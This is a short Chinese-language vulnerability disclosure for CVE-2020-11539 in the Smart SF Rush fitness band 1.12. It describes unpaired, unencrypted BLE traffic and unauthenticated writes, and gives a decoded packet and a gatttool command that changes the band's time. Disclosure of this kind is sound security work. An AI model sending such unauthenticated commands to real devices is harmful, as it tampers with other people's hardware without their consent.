描述: 已识别出该智能手环没有配对(BLE 安全级别模式 0),空中传输的数据未加密。此外,发送到智能手环的数据没有任何身份验证或签名验证,使得任何攻击者都能控制智能设备的参数。
影响版本: Smart SF Rush - 1.12
研究人员: Sayli Ambure (https://twitter.com/sayli_ambure)
MITRE CVE 链接: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539
以下数据包被逆向分析发现用于更改时间,通过从手机提取 hcisnoop 转储可以逆向出更多数据包。
数据值: 00870e00141401060712052b051e
| 数据十六进制: | 00 | 87 | 0e | 00 | 14 | 14 | 01 | 06 | 07 | 12 | 05 | 2b | 05 | 1e |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 数据十进制: | 00 | 135 | 14 | 00 | 20 | 20 | 01 | 06 | 07 | 18 | 05 | 43 | 05 | 30 |
发送以下 Gatttool 命令以控制智能手环的时间:
gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e